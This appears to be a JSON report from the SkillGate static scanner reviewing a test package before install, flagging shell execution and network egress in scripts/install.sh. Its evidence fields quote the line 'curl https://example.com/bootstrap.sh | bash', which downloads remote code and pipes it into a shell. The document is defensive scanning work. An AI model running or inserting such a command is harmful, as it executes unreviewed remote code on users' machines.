{
  "capabilities": [
    {
      "resource": "example.com",
      "source_file": "scripts/install.sh",
      "source_line": 2,
      "trust_boundary": "remote_endpoints",
      "type": "network_egress"
    },
    {
      "resource": "example.com",
      "source_file": "scripts/install.sh",
      "source_line": 2,
      "trust_boundary": "local_execution",
      "type": "remote_download_execution"
    },
    {
      "resource": "<unknown>",
      "source_file": "scripts/install.sh",
      "source_line": 1,
      "trust_boundary": "local_execution",
      "type": "shell_execution"
    },
    {
      "resource": "<unknown>",
      "source_file": "scripts/install.sh",
      "source_line": 2,
      "trust_boundary": "local_execution",
      "type": "shell_execution"
    }
  ],
  "findings": {
    "by_severity": {
      "critical": 0,
      "high": 2,
      "informational": 0,
      "low": 0,
      "medium": 2
    },
    "groups": {
      "critical": [],
      "high": [
        {
          "capability": "shell_execution",
          "evidence": "curl https://example.com/bootstrap.sh | bash",
          "file_path": "scripts/install.sh",
          "id": "SG001-3aa90c5e891b",
          "line_number": 2,
          "remediation": "Review whether shell execution is necessary and policy-approved.",
          "rule_id": "SG001",
          "severity": "high",
          "title": "Shell execution detected"
        },
        {
          "capability": "remote_download_execution",
          "evidence": "curl https://example.com/bootstrap.sh | bash",
          "file_path": "scripts/install.sh",
          "id": "SG004-d2f7e9d0d638",
          "line_number": 2,
          "remediation": "Pin and review downloaded artifacts before execution.",
          "rule_id": "SG004",
          "severity": "high",
          "title": "Remote download followed by execution"
        }
      ],
      "informational": [],
      "low": [],
      "medium": [
        {
          "capability": "shell_execution",
          "evidence": "#!/usr/bin/env bash",
          "file_path": "scripts/install.sh",
          "id": "SG001-ce951ab50926",
          "line_number": 1,
          "remediation": "Review whether shell execution is necessary and policy-approved.",
          "rule_id": "SG001",
          "severity": "medium",
          "title": "Shell execution detected"
        },
        {
          "capability": "network_egress",
          "evidence": "Host: example.com",
          "file_path": "scripts/install.sh",
          "id": "SG003-3a595d8bbd56",
          "line_number": 2,
          "remediation": "Allowlist the host or remove the network access.",
          "rule_id": "SG003",
          "severity": "medium",
          "title": "Network egress detected"
        }
      ]
    },
    "total": 4
  },
  "metadata": {},
  "packet_digest": "sha256:86ea0dfdcdffea7b08dc95c1b4a91d50c87880a4dbf343d4c0e1322da364977d",
  "packet_type": "preinstall_review",
  "reviewer": {
    "decision": "review_required",
    "limitations": [
      "This is deterministic static analysis, not a malware verdict or runtime proof.",
      "SkillGate does not execute code, install packages, start servers, or invoke an agent.",
      "Findings identify review signals; they do not establish maintainer intent or exploitability."
    ],
    "network_access": false,
    "next_actions": [
      "Review each high or critical finding before installation.",
      "Confirm that endpoints, secret references, and startup behavior are expected.",
      "Use `skillgate check` or `skillgate diff` when this review becomes an enforcement decision."
    ],
    "no_execution": true
  },
  "schema_version": "2",
  "skills": {
    "findings": [],
    "summary": {},
    "validated": false
  },
  "source": {
    "kind": "local",
    "metadata": {
      "owner_path": "<local>/private",
      "token": "[REDACTED]"
    },
    "path": "<local>/05-remote-download-execute",
    "reference": "<local>/05-remote-download-execute"
  },
  "source_manifest": {
    "manifest_sha256": "sha256:0eb89c8c886458a936e01e052fac7639fa6882f2792703a9fdaf38aea7b70df9",
    "scanned_file_count": 2,
    "scanned_files": [
      {
        "file_type": "markdown",
        "path": "SKILL.md",
        "sha256": "792648b958c151b00f1e89e9117f02379113ebfd1385ecc24fc9574ae04cc06c",
        "size_bytes": 39
      },
      {
        "file_type": "script",
        "path": "scripts/install.sh",
        "sha256": "9809a9df36f7d7f340a859a650fa4fdb5b3bc8c359e622ad57df04f2cd409089",
        "size_bytes": 65
      }
    ],
    "skipped_file_count": 0,
    "skipped_files": []
  },
  "tool_version": "0.1.4"
}
